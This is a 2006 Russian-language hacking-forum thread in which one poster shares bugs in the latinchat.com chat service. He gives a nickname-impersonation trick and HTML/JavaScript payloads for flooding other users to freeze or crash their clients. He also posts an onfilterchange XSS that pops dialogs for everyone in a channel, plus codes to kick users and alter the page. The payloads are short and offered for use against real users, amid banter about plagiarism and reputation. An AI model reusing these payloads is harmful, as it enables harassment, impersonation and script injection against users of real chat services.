Чаты бажный чат www.latinchat.com

Discussion in 'Веб-уязвимости' started by d4rk-d1G1T4L, 19 Sep 2006.

  1. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    привет всем=)) я тут новый . ну шас я хачу вам паказать как использовать баг в чате www.latinchat.com =) для этого мной бып создан chat-client на Mamga Protocol - что и собственно использует Starmedia Chat =) видео тутDownload

    если link не работает вот второй link =)

    Download2
     
    3 people like this.
  2. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Для этого есть www.video.antichat.ru
     
    1 person likes this.
  3. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    =)

    спасибо за инфа=) сказал ж я новый тут=))
     
  4. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    использование cbox дла "кражи" данных

    Updating
     
    #4 d4rk-d1G1T4L, 20 Sep 2006
    Last edited: 4 Mar 2007
  5. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    Java Chat в PHP

    Updating
     
    #5 d4rk-d1G1T4L, 20 Sep 2006
    Last edited: 14 Nov 2006
    1 person likes this.
  6. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    качаите мой последний клиент Magma y оцените=) тут 2 версии, англииский и испанский(recomended)

    http://x-project.ueuo.com/
     
    1 person likes this.
  7. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    клонирование юзеров в www.latinchat.com

    это очень просто,для Того чтоб заити уже сущестущем ником,просто надо дабавить 2 символов перед ник: *+
    exampl:

    original Nick : d4rk
    Clon:*+d4rk

    и вяглядет kak оригинал ;)
     
  8. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    Маленький php sniffer для latinchat.com

    updating
     
    #8 d4rk-d1G1T4L, 30 Sep 2006
    Last edited: 4 Mar 2007
    1 person likes this.
  9. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    надо было бы все это в виде статьи оформить..
    +, конечно..
     
  10. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    Новая фишка для приватов в latinchat

    этот код позволяет crash user так что он обязан закрыть chat ,это floopy freezer очень эффектныы:

    <img src='a:18' height=1>
    <img src='a:J18' height=1>
    <img src='a:O18' height=1>

    отправляя флюдом.

    а ето обичныы freezer.:

    <img src="" ondragover=";break"><img src='' onpaste=()';> <img dynsrc="http://www.broadmusic.com/charabank/webehon/new5ani.gif" loop=1 height=1>

    *
    5 лет работы на eShare и Magma сделало свое;) новая уязвимость , непровельныи филтр ID,просто заходя с ником юзера мы выкидаем его.уже известил админов LOL
     
  11. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    вот хоть режьте меня, но я почему-то считаю, что это копипаст
     
  12. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    что за бред

    Так нельзя ... тыб посмотрел мой клиент а у меня в етом чате свая репутация ,реж себе чего хочешь,захади там , полагаю 2 словечко на англииском знаеш так и спрашиваи ,а ранше не нужно нести бред.спрашиваи хорошенко о клиетах: Millenium , DarkChat, Ultraviolet и кому пренадлежит Killer ...без коментариев.

    на захади на мой саит и посмтри хорошенко за кого голосовали програмисти латинской aмерики,только не говори что это не мой web и не собираюсь коментировать всякие идиотизми

    d4rkweb
     
    #12 d4rk-d1G1T4L, 6 Oct 2006
    Last edited: 6 Oct 2006
  13. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8

    А вот еще что,я тут по одной причине:чтоб люди по больше узнали и ни для плюсиков,мне всеравно хоть поставь -100 ,когда я опубликовал все это на своем саите мне сказали что есть такая группа antichat где обсуждать эти теми будет интересно,так и сделал и мне коментарии такие просто на смех не хватает потаму что я зашел тут чтоб внести чтото новое,а ни из за символиков +,потому что оно у меня уже есть большой плюсик в этой сфере=p так что без лишних коментариев
     
  14. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Ты не кричи раньше времени. Копипастом отдает тут из-за странного изложения материала и из-за кривизны грамматики. Как будто Promt поработал....
    А если это действительно сделал ты, то респект тебе, конечно же
     
  15. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    а это обяснимa:я плохо говрю по русский,более того мой друзья мне помагают за что я говорю спосибо им.я не русскии и весь мои иатериял на исспанском и италианском.мне приходится перевести все в чем мне помагают друзя .ну и за ошибки принесу свои извинения,но делаю все что магу,больше в данный moment не обишаю,надеюсь улучшить свой знание русского :cool:
     
  16. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Тогда извини. Забираю свои слова обратно.
     
  17. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    Codes:

    Code:
    <font color='#000000'><font color='#000000'><font color=black><font color style="filter:alpha();height:1" onfilterchange="confirm(тут текст')">l</font></FONT></font>
    для отправки alert сообщения в чат всем юзером.работает только в каналах созданных юзерами.

    Code:

    Code:
    <img src="#" height=1><a href=http://images.latinchat.com/upload/images/></A> //07<br>
    с эти кодом можно прогнать юзера. почти во всех чатах можно поиграть с иконками,вот и пример от vulnerablity

    Code:

    Code:
    <a href=font color=YELLOW style="filter:blur();height=1" onfilterchange="document.bgColor=('BLUE');">AZUL
    для background .

    все vulnerability и их анализ нахдится на мой cайт,c эпохи eShare Protocol до Magma.

    до встречи
     
  18. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    обсуждение XSS в latinchat.com

    updating
     
    #18 d4rk-d1G1T4L, 15 Nov 2006
    Last edited: 4 Mar 2007
  19. d4rk-d1G1T4L

    d4rk-d1G1T4L Member

    Joined:
    19 Sep 2006
    Messages:
    24
    Likes Received:
    10
    Reputations:
    8
    новая уязвимость

    update
     
    #19 d4rk-d1G1T4L, 15 Nov 2006
    Last edited: 8 Apr 2007
  20. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    No Comments!
    5 баллов. Так как + тебе не надо, то оставлю свой единтсвенный))) у себя! А так - РЕСПЕКТище!)